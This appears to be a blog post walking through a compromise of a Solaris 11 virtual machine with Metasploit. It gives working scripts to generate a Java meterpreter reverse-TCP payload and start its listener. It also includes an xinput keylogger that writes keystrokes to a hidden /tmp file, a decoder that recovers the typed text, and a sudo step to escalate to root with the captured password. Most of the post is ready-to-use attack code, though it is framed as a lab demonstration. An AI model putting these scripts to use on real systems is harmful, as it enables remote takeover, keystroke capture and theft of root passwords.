Solaris 11 and Metasplolit

Just to follow up on the different OS scenarios from the previous posts, here is a test done on Solaris 11.1 x86 in Qemu KVM. Setup is nothing special, standard way of creating hdd qcow2 image, and launching the VM. Here is my script that does that:

 kvm -m 1024 -vga vmware -drive file=hdd.img,cache=none,index=1 -net nic,model=rtl8139,macaddr=10:1f:74:56:47:58 -net user

solaris02

Once the system is up, setup a meterpreter java listener on the host and generate a java payload for the Solaris guest. I have used the same scripts like for OSX because of the meterpreter Java

clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
./msfpayload java/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R > test.jar
mkdir ShellCode
mv test.jar ShellCode
echo "test.jar generated in ShellCode folder..."

The listener is identical:

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo "***************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo " starting the meterpreter listener.."
./msfcli exploit/multi/handler PAYLOAD=java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=$port E

The generated jar file should be placed on the guest Solaris and executed for demonstration. Again this is just a simulation, nothing that a normal savvy admin would do :) So lets just pretend the file is there and the user “double clicks it”

The java meterpreter payload works as expected and we get a reverse shell on our host. Lets try and exploit the Xorg xinput to get some user keyboard input.

In order to exploit the xinput keylogging capability I had to change just a little the initial linux xinput keylog script like so:

#!/bin/bash
export DISPLAY=:0.0
xinput list
echo -e "KBD ID ?"
read kbd
xmodmap -pke > /tmp/.xkey.log
script | xinput test $kbd >> /tmp/.xkey.log &
exit

The script command on Solaris does not accept the -c parameter like in various distributions  of Linux so we cannot tell what command to run. Here we have this little exception because when stdout is not a terminal (we redirect to .xkey.log) output is buffered in 4k chunks. If you CTRL+C the buffer gets lost, so we just need to exit the shell once the logger starts and wait for user input on the keyboard. The file .xkey.log will grow in 4k chunks at a time.

After some time, the .xkey.log gets downloaded from /tmp and decoded by the following script:

#!/bin/sh
cat .xkey.log | grep keycode > xmodmap.pke
cat .xkey.log | grep 'key p' > xlog
rm -f .xkey.log
#Generating some Python to do the decoding
echo 'import re, collections, sys' > decoder.py
echo 'from subprocess import *' >> decoder.py
echo 'def keyMap():' >> decoder.py
echo ' table = open("xmodmap.pke")' >> decoder.py
echo ' key = []' >> decoder.py
echo ' for line in table:' >> decoder.py
echo " m = re.match('keycode +(\d+) = (.+)', line.decode())" >> decoder.py
echo ' if m and m.groups()[1]:' >> decoder.py
echo ' key.append(m.groups()[1].split()[0]+"_____"+m.groups()[0])' >> decoder.py
echo ' return key' >> decoder.py
echo 'def printV(letter):' >> decoder.py
echo ' key=keyMap();' >> decoder.py
echo ' for i in key:' >> decoder.py
echo ' if str(letter) == i.split("_____")[1]:' >> decoder.py
echo ' return i.split("_____")[0]' >> decoder.py
echo ' return letter' >> decoder.py
echo 'if len(sys.argv) < 2:' >> decoder.py
echo ' print "Usage: %s FILE" % sys.argv[0];' >> decoder.py
echo ' exit();' >> decoder.py
echo 'else:' >> decoder.py
echo ' f = open(sys.argv[1])' >> decoder.py
echo ' lines = f.readlines()' >> decoder.py
echo ' f.close()' >> decoder.py
echo ' for line in lines:' >> decoder.py
echo " m = re.match('key press +(\d+)', line)" >> decoder.py
echo ' if m:' >> decoder.py
echo ' keycode = m.groups()[0]' >> decoder.py
echo ' print (printV(keycode))' >> decoder.py

echo 'Please see LOG-keylogger for the output......'
python decoder.py xlog > LOG
sed ':a;N;$!ba;s/\n/ /g' LOG > LOG-keylogger
rm -f LOG
rm -f xmodmap.pke
rm -f decoder.py
rm -f xlog
cat LOG-keylogger

Once you have the root password :) you can do the following from the Meterpreter shell in order to elevate to root:

sudo -S su

And here is a video demonstration of the above process:

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s